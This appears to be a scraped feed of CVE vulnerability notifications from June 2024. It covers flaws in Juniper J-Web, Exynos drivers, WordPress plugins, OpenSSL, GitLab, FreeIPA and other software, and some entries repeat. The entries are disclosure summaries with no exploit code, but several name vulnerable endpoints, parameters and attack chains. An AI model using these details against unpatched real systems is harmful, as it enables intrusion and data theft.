🚨 CVE-2024-27377An issue was discovered in Samsung Mobile Processor Exynos 980, Exynos 850, Exynos 1280, Exynos 1380, and Exynos 1330. In the function slsi_nan_get_security_info_nl(), there is no input validation check on sec_info->key_info.body.pmk_info.pmk_len coming from userspace, which can lead to a heap overwrite.🎖@cveNotify |
|
| 2024-06-27 15:07:33 |
🚨 CVE-2024-23282The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.5, watchOS 10.5, iOS 17.5 and iPadOS 17.5, iOS 16.7.8 and iPadOS 16.7.8. A maliciously crafted email may be able to initiate FaceTime calls without user authorization.🎖@cveNotify |
|
| 2024-06-27 15:07:32 |
🚨 CVE-2024-23251An authentication issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.5, watchOS 10.5, iOS 17.5 and iPadOS 17.5, iOS 16.7.8 and iPadOS 16.7.8. An attacker with physical access may be able to leak Mail account credentials.🎖@cveNotify |
|
| 2024-06-27 15:07:31 |
🚨 CVE-2024-36669idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component admin/type_deal.php?mudi=add.🎖@cveNotify |
|
| 2024-06-27 15:07:30 |
🚨 CVE-2024-36668idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component admin/type_deal.php?mudi=del🎖@cveNotify |
|
| 2024-06-27 15:07:26 |
🚨 CVE-2023-36845A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to remotely execute code.Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code.This issue affects Juniper Networks Junos OS on EX Seriesand SRX Series: * All versions prior to 20.4R3-S9; * 21.1 versions 21.1R1 and later; * 21.2 versions prior to 21.2R3-S7; * 21.3 versions prior to 21.3R3-S5; * 21.4 versions prior to 21.4R3-S5; * 22.1 versions prior to 22.1R3-S4; * 22.2 versions prior to 22.2R3-S2; * 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; * 22.4 versions prior to 22.4R2-S1, 22.4R3; * 23.2 versions prior to 23.2R1-S1, 23.2R2.🎖@cveNotify |
|
| 2024-06-27 15:07:25 |
🚨 CVE-2017-5510coders/psd.c in ImageMagick allows remote attackers to have unspecified impact via a crafted PSD file, which triggers an out-of-bounds write.🎖@cveNotify |
|
| 2024-06-27 15:07:24 |
🚨 CVE-2017-5509coders/psd.c in ImageMagick allows remote attackers to have unspecified impact via a crafted PSD file, which triggers an out-of-bounds write.🎖@cveNotify |
|
| 2024-06-27 14:37:25 |
🚨 CVE-2023-36847A Missing Authentication for Critical Function vulnerability in Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to cause limited impact to the file system integrity.With a specific request to installAppPackage.php that doesn't require authentication an attacker is able to upload arbitrary files via J-Web, leading to a loss of integrityfor a certain part of the file system, which may allow chaining to other vulnerabilities.This issue affects Juniper Networks Junos OS on EX Series: * All versions prior to 20.4R3-S8; * 21.1 versions 21.1R1 and later; * 21.2 versions prior to 21.2R3-S6; * 21.3 versions prior to 21.3R3-S5; * 21.4 versions prior to 21.4R3-S4; * 22.1 versions prior to 22.1R3-S3; * 22.2 versions prior to 22.2R3-S1; * 22.3 versions prior to 22.3R2-S2, 22.3R3; * 22.4 versions prior to 22.4R2-S1, 22.4R3.🎖@cveNotify |
|
| 2024-06-27 13:07:46 |
🚨 CVE-2024-38520SoftEtherVPN is a an open-source cross-platform multi-protocol VPN Program. When SoftEtherVPN is deployed with L2TP enabled on a device, it introduces the possibility of the host being used for amplification/reflection traffic generation because it will respond to every packet with two response packets that are larger than the request packet size. These sorts of techniques are used by external actors who generate spoofed source IPs to target a destination on the internet. This vulnerability has been patched in version 5.02.5185.🎖@cveNotify |
|
| 2024-06-27 13:07:45 |
🚨 CVE-2024-33329A hardcoded privileged ID within Lumisxp v15.0.x to v16.1.x allows attackers to bypass authentication and access internal pages and other sensitive information.🎖@cveNotify |
|
| 2024-06-27 13:07:44 |
🚨 CVE-2024-33328A cross-site scripting (XSS) vulnerability in the component main.jsp of Lumisxp v15.0.x to v16.1.x allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the pageId parameter.🎖@cveNotify |
|
| 2024-06-27 13:07:41 |
🚨 CVE-2024-33327A cross-site scripting (XSS) vulnerability in the component UrlAccessibilityEvaluation.jsp of Lumisxp v15.0.x to v16.1.x allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the contentHtml parameter.🎖@cveNotify |
|
| 2024-06-27 13:07:40 |
🚨 CVE-2024-35545MAP-OS v4.45.0 and earlier was discovered to contain a cross-site scripting (XSS) vulnerability.🎖@cveNotify |
|
| 2024-06-27 13:07:39 |
🚨 CVE-2024-39460Jenkins Bitbucket Branch Source Plugin 886.v44cf5e4ecec5 and earlier prints the Bitbucket OAuth access token as part of the Bitbucket URL in the build log in some cases.🎖@cveNotify |
|
| 2024-06-27 13:07:35 |
🚨 CVE-2024-39459In rare cases Jenkins Plain Credentials Plugin 182.v468b_97b_9dcb_8 and earlier stores secret file credentials unencrypted (only Base64 encoded) on the Jenkins controller file system, where they can be viewed by users with access to the Jenkins controller file system (global credentials) or with Item/Extended Read permission (folder-scoped credentials).🎖@cveNotify |
|
| 2024-06-27 13:07:34 |
🚨 CVE-2024-38271There exists a vulnerability in Quickshare/Nearby where an attacker can force the a victim to stay connected to a temporary hotspot created for the share. As part of the sequence of packets in a QuickShare connection over Bluetooth, the attacker forces the victim to connect to the attacker’s WiFi network and then sends an OfflineFrame that crashes Quick Share.This makes the Wifi connection to the attacker’s network last instead of returning to the old network when the Quick Share session is done allowing the attacker to be a MiTM. We recommend upgrading to version 1.0.1724.0 of Quickshare or above🎖@cveNotify |
|
| 2024-06-27 13:07:33 |
🚨 CVE-2024-25637October is a self-hosted CMS platform based on the Laravel PHP Framework. The X-October-Request-Handler Header does not sanitize the AJAX handler name and allows unescaped HTML to be reflected back. There is no impact since this vulnerability cannot be exploited through normal browser interactions. This unescaped value is only detectable when using a proxy interception tool. This issue has been patched in version 3.5.15.🎖@cveNotify |
|
| 2024-06-27 13:07:29 |
🚨 CVE-2024-4228Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'), CWE - 200 - Exposure of Sensitive Information to an Unauthorized Actor, CWE - 522 - Insufficiently Protected Credentials vulnerability in Magarsus Consultancy SSO (Single Sign On) allows SQL Injection.This issue affects SSO (Single Sign On): from 1.0 before 1.1.🎖@cveNotify |
|
| 2024-06-27 13:07:28 |
🚨 CVE-2019-20503usrsctp before 2019-12-20 has out-of-bounds reads in sctp_load_addresses_from_init.🎖@cveNotify |
|
| 2024-06-27 11:37:25 |
🚨 CVE-2024-6262The Portfolio Gallery – Image Gallery Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'PFG' shortcode in all versions up to, and including, 1.6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-27 11:37:24 |
🚨 CVE-2024-5535Issue summary: Calling the OpenSSL API function SSL_select_next_proto with anempty supported client protocols buffer may cause a crash or memory contents tobe sent to the peer.Impact summary: A buffer overread can have a range of potential consequencessuch as unexpected application beahviour or a crash. In particular this issuecould result in up to 255 bytes of arbitrary private data from memory being sentto the peer leading to a loss of confidentiality. However, only applicationsthat directly call the SSL_select_next_proto function with a 0 length list ofsupported client protocols are affected by this issue. This would normally neverbe a valid scenario and is typically not under attacker control but may occur byaccident in the case of a configuration or programming error in the callingapplication.The OpenSSL API function SSL_select_next_proto is typically used by TLSapplications that support ALPN (Application Layer Protocol Negotiation) or NPN(Next Protocol Negotiation). NPN is older, was never standardised andis deprecated in favour of ALPN. We believe that ALPN is significantly morewidely deployed than NPN. The SSL_select_next_proto function accepts a list ofprotocols from the server and a list of protocols from the client and returnsthe first protocol that appears in the server list that also appears in theclient list. In the case of no overlap between the two lists it returns thefirst item in the client list. In either case it will signal whether an overlapbetween the two lists was found. In the case where SSL_select_next_proto iscalled with a zero length client list it fails to notice this condition andreturns the memory immediately following the client list pointer (and reportsthat there was no overlap in the lists).This function is typically called from a server side application callback forALPN or a client side application callback for NPN. In the case of ALPN the listof protocols supplied by the client is guaranteed by libssl to never be zero inlength. The list of server protocols comes from the application and should nevernormally be expected to be of zero length. In this case if theSSL_select_next_proto function has been called as expected (with the listsupplied by the client passed in the client/client_len parameters), then theapplication will not be vulnerable to this issue. If the application hasaccidentally been configured with a zero length server list, and hasaccidentally passed that zero length server list in the client/client_lenparameters, and has additionally failed to correctly handle a "no overlap"response (which would normally result in a handshake failure in ALPN) then itwill be vulnerable to this problem.In the case of NPN, the protocol permits the client to opportunistically selecta protocol when there is no overlap. OpenSSL returns the first client protocolin the no overlap case in support of this. The list of client protocols comesfrom the application and should never normally be expected to be of zero length.However if the SSL_select_next_proto function is accidentally called with aclient_len of 0 then an invalid memory pointer will be returned instead. If theapplication uses this output as the opportunistic protocol then the loss ofconfidentiality will occur.This issue has been assessed as Low severity because applications are mostlikely to be vulnerable if they are using NPN instead of ALPN - but NPN is notwidely used. It also requires an application configuration or programming error.Finally, this issue would not typically be under attacker control making activeexploitation unlikely.The FIPS modules in 3.3, 3.2, 3.1 and 3.0 are not affected by this issue.Due to the low severity of this issue we are not issuing new releases ofOpenSSL at this time. The fix will be included in the next releases when theybecome available.🎖@cveNotify |
|
| 2024-06-27 10:37:25 |
🚨 CVE-2024-0949Improper Access Control, Missing Authorization, Incorrect Authorization, Incorrect Permission Assignment for Critical Resource, Missing Authentication, Weak Authentication, Improper Restriction of Communication Channel to Intended Endpoints vulnerability in Talya Informatics Elektraweb allows Exploiting Incorrectly Configured Access Control Security Levels, Manipulating Web Input to File System Calls, Embedding Scripts within Scripts, Malicious Logic Insertion, Modification of Windows Service Configuration, Malicious Root Certificate, Intent Spoof, WebView Exposure, Data Injected During Configuration, Incomplete Data Deletion in a Multi-Tenant Environment, Install New Service, Modify Existing Service, Install Rootkit, Replace File Extension Handlers, Replace Trusted Executable, Modify Shared File, Add Malicious File to Shared Webroot, Run Software at Logon, Disable Security Software.This issue affects Elektraweb: before v17.0.68.🎖@cveNotify |
|
| 2024-06-27 10:37:24 |
🚨 CVE-2023-7270An issue was discovered in SoftMaker Office 2024 / NX before revision 1214 and SoftMaker FreeOffice 2014 before revision 1215. FreeOffice 2021 is also affected, but won't be fixed.The SoftMaker Office and FreeOffice MSI installer files were found to produce a visible conhost.exe window running as the SYSTEM user when using the repair function of msiexec.exe. This allows a local, low-privileged attacker to use a chain of actions, to open a fully functional cmd.exe with the privileges of the SYSTEM user.🎖@cveNotify |
|
| 2024-06-27 09:37:24 |
🚨 CVE-2024-4983The The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘video_color’ parameter in all versions up to, and including, 5.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-27 08:37:24 |
🚨 CVE-2024-5601The Create by Mediavine plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Schema Meta shortcode in all versions up to, and including, 1.9.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-27 07:37:25 |
🚨 CVE-2024-22232A specially crafted url can be created which leads to a directory traversal in the salt file server.A malicious user can read an arbitrary file from a Salt master’s filesystem.🎖@cveNotify |
|
| 2024-06-27 07:37:24 |
🚨 CVE-2024-22231Syndic cache directory creation is vulnerable to a directory traversal attack in salt project which can lead a malicious attacker to create an arbitrary directory on a Salt master.🎖@cveNotify |
|
| 2024-06-27 06:37:25 |
🚨 CVE-2024-3111The Interactive Content WordPress plugin before 1.15.8 does not validate uploads which could allow a Contributors and above to update malicious SVG files, leading to Stored Cross-Site Scripting issues🎖@cveNotify |
|
| 2024-06-27 06:37:24 |
🚨 CVE-2024-1330The kadence-blocks-pro WordPress plugin before 2.3.8 does not prevent users with at least the contributor role using some of its shortcode's functionalities to leak arbitrary options from the database.🎖@cveNotify |
|
| 2024-06-27 05:37:25 |
🚨 CVE-2024-5154A flaw was found in cri-o. A malicious container can create a symbolic link pointing to an arbitrary directory or file on the host via directory traversal (“../“). This flaw allows the container to read and write to arbitrary files on the host system.🎖@cveNotify |
|
| 2024-06-27 05:37:24 |
🚨 CVE-2024-1394A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them.🎖@cveNotify |
|
| 2024-06-27 04:37:25 |
🚨 CVE-2024-4570The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘url’ parameter in versions up to, and including, 1.13.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-27 04:37:24 |
🚨 CVE-2024-4569The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘url’ parameter in versions up to, and including, 1.13.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-27 03:37:36 |
🚨 CVE-2024-6054The Auto Featured Image plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'create_post_attachment_from_url' function in all versions up to, and including, 1.2. This makes it possible for authenticated attackers, with contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-06-27 03:37:35 |
🚨 CVE-2024-5289The Gutenberg Blocks with AI by Kadence WP – Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Google Maps widget parameters in all versions up to, and including, 3.2.42 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-27 03:37:32 |
🚨 CVE-2024-6293Use after free in Dawn in Google Chrome prior to 126.0.6478.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-27 03:37:31 |
🚨 CVE-2024-6291Use after free in Swiftshader in Google Chrome prior to 126.0.6478.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-27 03:37:30 |
🚨 CVE-2024-38277A unique key should be generated for a user's QR login key and their auto-login key, so the same key cannot be used interchangeably between the two.🎖@cveNotify |
|
| 2024-06-27 03:37:26 |
🚨 CVE-2024-38274Insufficient escaping of calendar event titles resulted in a stored XSS risk in the event deletion prompt.🎖@cveNotify |
|
| 2024-06-27 03:37:25 |
🚨 CVE-2024-3183A vulnerability was found in FreeIPA in a way when a Kerberos TGS-REQ is encrypted using the client’s session key. This key is different for each new session, which protects it from brute force attacks. However, the ticket it contains is encrypted using the target principal key directly. For user principals, this key is a hash of a public per-principal randomly-generated salt and the user’s password.If a principal is compromised it means the attacker would be able to retrieve tickets encrypted to any principal, all of them being encrypted by their own key directly. By taking these tickets and salts offline, the attacker could run brute force attacks to find character strings able to decrypt tickets when combined to a principal salt (i.e. find the principal’s password).🎖@cveNotify |
|
| 2024-06-27 03:37:24 |
🚨 CVE-2024-2698A vulnerability was found in FreeIPA in how the initial implementation of MS-SFU by MIT Kerberos was missing a condition for granting the "forwardable" flag on S4U2Self tickets. Fixing this mistake required adding a special case for the check_allowed_to_delegate() function: If the target service argument is NULL, then it means the KDC is probing for general constrained delegation rules and not checking a specific S4U2Proxy request.In FreeIPA 4.11.0, the behavior of ipadb_match_acl() was modified to match the changes from upstream MIT Kerberos 1.20. However, a mistake resulting in this mechanism applies in cases where the target service argument is set AND where it is unset. This results in S4U2Proxy requests being accepted regardless of whether or not there is a matching service delegation rule.🎖@cveNotify |
|
| 2024-06-27 01:07:33 |
🚨 CVE-2022-2586It was discovered that a nft object or expression could reference a nft set on a different nft table, leading to a use-after-free once that table was deleted.🎖@cveNotify |
|
| 2024-06-27 01:07:32 |
🚨 CVE-2020-13965An issue was discovered in Roundcube Webmail before 1.3.12 and 1.4.x before 1.4.5. There is XSS via a malicious XML attachment because text/xml is among the allowed types for a preview.🎖@cveNotify |
|
| 2024-06-27 00:37:32 |
🚨 CVE-2024-3959An issue was discovered in GitLab CE/EE affecting all versions starting from 16.7 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, which allows private job artifacts can be accessed by any user.🎖@cveNotify |
|
| 2024-06-27 00:37:26 |
🚨 CVE-2024-3115An issue was discovered in GitLab EE affecting all versions starting from 16.0 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, which allows an attacker to access issues and epics without having an SSO session using Duo Chat.🎖@cveNotify |
|
| 2024-06-27 00:37:25 |
🚨 CVE-2024-1493An issue was discovered in GitLab CE/EE affecting all versions starting from 9.2 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, with the processing logic for generating link in dependency files can lead to a regular expression DoS attack on the server🎖@cveNotify |
|
| 2024-06-27 00:37:24 |
🚨 CVE-2024-6344A vulnerability, which was classified as problematic, was found in ZKTeco ZKBio CVSecurity V5000 4.1.0. This affects an unknown part of the component Push Configuration Section. The manipulation of the argument Configuration Name leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-269733 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-26 23:37:25 |
🚨 CVE-2024-28984Hitachi Vantara Pentaho Business Analytics Server prior to versions 10.1.0.0 and 9.3.0.7, including 8.3.x allow a malicious URL to inject content into the Analyzer plugin interface.🎖@cveNotify |
|
| 2024-06-26 23:37:24 |
🚨 CVE-2024-28982Hitachi Vantara Pentaho Business Analytics Server versions before 10.1.0.0 and 9.3.0.7, including 8.3.x do not correctly protect the ACL service endpoint of the Pentaho User Console against XML External Entity Reference.🎖@cveNotify |
|
| 2024-06-26 22:37:25 |
🚨 CVE-2024-37248Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in CryoutCreations Anima allows Stored XSS.This issue affects Anima: from n/a through 1.4.1.🎖@cveNotify |
|
| 2024-06-26 22:37:24 |
🚨 CVE-2024-37247Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in twinpictures, baden03 jQuery T(-) Countdown Widget allows Stored XSS.This issue affects jQuery T(-) Countdown Widget: from n/a through 2.3.25.🎖@cveNotify |
|
| 2024-06-26 21:37:41 |
🚨 CVE-2024-6355A vulnerability was found in Genexis Tilgin Fiber Home Gateway HG1522 CSx000-01_09_01_12. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /status/product_info/. The manipulation of the argument product_info leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269755. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-26 21:37:38 |
🚨 CVE-2024-36829Incorrect access control in Teldat M1 v11.00.05.50.01 allows attackers to obtain sensitive information via a crafted query string.🎖@cveNotify |
|
| 2024-06-26 21:37:37 |
🚨 CVE-2024-23766An issue was discovered on HMS Anybus X-Gateway AB7832-F 3 devices. The gateway exposes a web interface on port 80. An unauthenticated GET request to a specific URL triggers the reboot of the Anybus gateway (or at least most of its modules). An attacker can use this feature to carry out a denial of service attack by continuously sending GET requests to that URL.🎖@cveNotify |
|
| 2024-06-26 21:37:36 |
🚨 CVE-2024-1839Intrado 911 Emergency Gateway login form is vulnerable to an unauthenticated blind time-based SQL injection, which may allow an unauthenticated remote attacker to execute malicious code, exfiltrate data, or manipulate the database.🎖@cveNotify |
|
| 2024-06-26 21:37:31 |
🚨 CVE-2018-17865A cross-site scripting (XSS) vulnerability in SAP J2EE Engine 7.01 allows remote attackers to inject arbitrary web script via the wsdlPath parameter to /ctcprotocol/Protocol. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-06-26 21:37:30 |
🚨 CVE-2020-28198The 'id' parameter of IBM Tivoli Storage Manager Version 5 Release 2 (Command Line Administrative Interface, dsmadmc.exe) is vulnerable to an exploitable stack buffer overflow. Note: the vulnerability can be exploited when it is used in "interactive" mode while, cause of a max number characters limitation, it cannot be exploited in batch or command line usage (e.g. dsmadmc.exe -id=username -password=pwd). NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-06-26 21:37:26 |
🚨 CVE-2019-25033Unbound before 1.9.5 allows an integer overflow in the regional allocator via the ALIGN_UP macro. NOTE: The vendor disputes that this is a vulnerability. Although the code may be vulnerable, a running Unbound installation cannot be remotely or locally exploited🎖@cveNotify |
|
| 2024-06-26 21:37:25 |
🚨 CVE-2020-35734Sruu.pl in Batflat 1.3.6 allows an authenticated user to perform code injection (and consequently Remote Code Execution) via the input fields of the Users tab. To exploit this, one must login to the administration panel and edit an arbitrary user's data (username, displayed name, etc.). NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-06-26 21:37:24 |
🚨 CVE-2020-27583IBM InfoSphere Information Server 8.5.0.0 is affected by deserialization of untrusted data which could allow remote unauthenticated attackers to execute arbitrary code. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-06-26 20:37:43 |
🚨 CVE-2020-35722CSRF in Web Compliance Manager in Quest Policy Authority 8.1.2.200 allows remote attackers to force user modification/creation via a specially crafted link to the submitUser.jsp file. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-06-26 20:37:42 |
🚨 CVE-2020-28975svm_predict_values in svm.cpp in Libsvm v324, as used in scikit-learn 0.23.2 and other products, allows attackers to cause a denial of service (segmentation fault) via a crafted model SVM (introduced via pickle, json, or any other model permanence standard) with a large value in the _n_support array. NOTE: the scikit-learn vendor's position is that the behavior can only occur if the library's API is violated by an application that changes a private attribute.🎖@cveNotify |
|
| 2024-06-26 20:37:41 |
🚨 CVE-2020-26546An issue was discovered in HelpDeskZ 1.0.2. The feature to auto-login a user, via the RememberMe functionality, is prone to SQL injection. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-06-26 20:37:38 |
🚨 CVE-2020-25756A buffer overflow vulnerability exists in the mg_get_http_header function in Cesanta Mongoose 6.18 due to a lack of bounds checking. A crafted HTTP header can exploit this bug. NOTE: a committer has stated "this will not happen in practice.🎖@cveNotify |
|
| 2024-06-26 20:37:37 |
🚨 CVE-2020-15502The DuckDuckGo application through 5.58.0 for Android, and through 7.47.1.0 for iOS, sends hostnames of visited web sites within HTTPS .ico requests to servers in the duckduckgo.com domain, which might make visit data available temporarily at a Potentially Unwanted Endpoint. NOTE: the vendor has stated "the favicon service adheres to our strict privacy policy.🎖@cveNotify |
|
| 2024-06-26 20:37:36 |
🚨 CVE-2020-11967In IQrouter through 3.3.1, remote attackers can control the device (restart network, reboot, upgrade, reset) because of Incorrect Access Control. Note: The vendor claims that this vulnerability can only occur on a brand-new network that, after initiating the forced initial configuration (which has a required step for setting a secure password on the system), makes this CVE invalid. This vulnerability is “true for any unconfigured release of OpenWRT, and true of many other new Linux distros prior to being configured for the first time”🎖@cveNotify |
|
| 2024-06-26 20:37:32 |
🚨 CVE-2020-9352An issue was discovered in SmartClient 12.0. Unauthenticated exploitation of blind XXE can occur in the downloadWSDL feature by sending a POST request to /tools/developerConsoleOperations.jsp with a valid payload in the _transaction parameter. NOTE: the documentation states "These tools are, by default, available to anyone ... so they should only be deployed into a trusted environment. Alternately, the tools can easily be restricted to administrators or end users by protecting the tools path with normal authentication and authorization mechanisms on the web server."🎖@cveNotify |
|
| 2024-06-26 20:37:31 |
🚨 CVE-2019-16388PEGA Platform 8.3.0 is vulnerable to Information disclosure via a direct prweb/sso/random_token/!STANDARD?pyStream=MyAlerts request to get Audit Log information while using a low-privilege account. NOTE: The vendor states that this vulnerability was discovered using an administrator account and they are normal administrator functions. Therefore, the claim that the CVE was done with a low privilege account is incorrect🎖@cveNotify |
|
| 2024-06-26 20:37:30 |
🚨 CVE-2018-14495Vivotek FD8136 devices allow Remote Command Injection, aka "another command injection vulnerability in our target device," a different issue than CVE-2018-14494. NOTE: The vendor has disputed this as a vulnerability and states that the issue does not cause a web server crash or have any other affect on it's performance🎖@cveNotify |
|
| 2024-06-26 20:37:27 |
🚨 CVE-2018-18014* Lack of authentication in Citrix Xen Mobile through 10.8 allows low-privileged local users to execute system commands as root by making requests to private services listening on ports 8000, 30000 and 30001. NOTE: the vendor disputes that this is a vulnerability, stating it is "already mitigated by the internal firewall that limits access to configuration services to localhost.🎖@cveNotify |
|
| 2024-06-26 20:37:26 |
🚨 CVE-2018-5276In Malwarebytes Premium 3.3.1.2183, the driver file (FARFLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x9c40e018. NOTE: the vendor reported that they "have not been able to reproduce the issue on any Windows operating system version (32-bit or 64-bit).🎖@cveNotify |
|
| 2024-06-26 20:37:25 |
🚨 CVE-2017-8459Brave 0.12.4 has a Status Bar Obfuscation issue in which a redirection target is shown in a possibly unexpected way. NOTE: third parties dispute this issue because it is a behavior that might have legitimate applications in (for example) the display of web-search results🎖@cveNotify |
|
| 2024-06-26 20:07:26 |
🚨 CVE-2023-42917A memory corruption vulnerability was addressed with improved locking. This issue is fixed in iOS 17.1.2 and iPadOS 17.1.2, macOS Sonoma 14.1.2, Safari 17.1.2. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.🎖@cveNotify |
|
| 2024-06-26 20:07:25 |
🚨 CVE-2023-42916An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 17.1.2 and iPadOS 17.1.2, macOS Sonoma 14.1.2, Safari 17.1.2. Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.🎖@cveNotify |
|
| 2024-06-26 20:07:24 |
🚨 CVE-2023-49103An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system. Therefore, even if ownCloud is not running in a containerized environment, this vulnerability should still be a cause for concern. Note that Docker containers from before February 2023 are not vulnerable to the credential disclosure.🎖@cveNotify |
|
| 2024-06-26 19:37:39 |
🚨 CVE-2024-38520SoftEtherVPN is a an open-source cross-platform multi-protocol VPN Program. When SoftEtherVPN is deployed with L2TP enabled on a device, it introduces the possibility of the host being used for amplification/reflection traffic generation because it will respond to every packet with two response packets that are larger than the request packet size. These sorts of techniques are used by external actors who generate spoofed source IPs to target a destination on the internet. This vulnerability has been patched in version 5.02.5185.🎖@cveNotify |
|
| 2024-06-26 19:37:38 |
🚨 CVE-2024-33329A hardcoded privileged ID within Lumisxp v15.0.x to v16.1.x allows attackers to bypass authentication and access internal pages and other sensitive information.🎖@cveNotify |
|
| 2024-06-26 19:37:37 |
🚨 CVE-2024-33328A cross-site scripting (XSS) vulnerability in the component main.jsp of Lumisxp v15.0.x to v16.1.x allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the pageId parameter.🎖@cveNotify |
|
| 2024-06-26 19:37:36 |
🚨 CVE-2024-33327A cross-site scripting (XSS) vulnerability in the component UrlAccessibilityEvaluation.jsp of Lumisxp v15.0.x to v16.1.x allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the contentHtml parameter.🎖@cveNotify |
|
| 2024-06-26 19:37:33 |
🚨 CVE-2024-33326A cross-site scripting (XSS) vulnerability in the component XsltResultControllerHtml.jsp of Lumisxp v15.0.x to v16.1.x allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the lumPageID parameter.🎖@cveNotify |
|
| 2024-06-26 19:37:32 |
🚨 CVE-2024-6269A vulnerability has been found in Ruijie RG-UAC 1.0 and classified as critical. This vulnerability affects the function get_ip.addr_details of the file /view/vpn/autovpn/sxh_vpnlic.php of the component HTTP POST Request Handler. The manipulation of the argument indevice leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-269482 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-26 19:37:31 |
🚨 CVE-2024-2941A vulnerability, which was classified as critical, has been found in Campcodes Online Examination System 1.0. Affected by this issue is some unknown functionality of the file /adminpanel/admin/query/loginExe.php. The manipulation of the argument pass leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258032.🎖@cveNotify |
|
| 2024-06-26 19:37:26 |
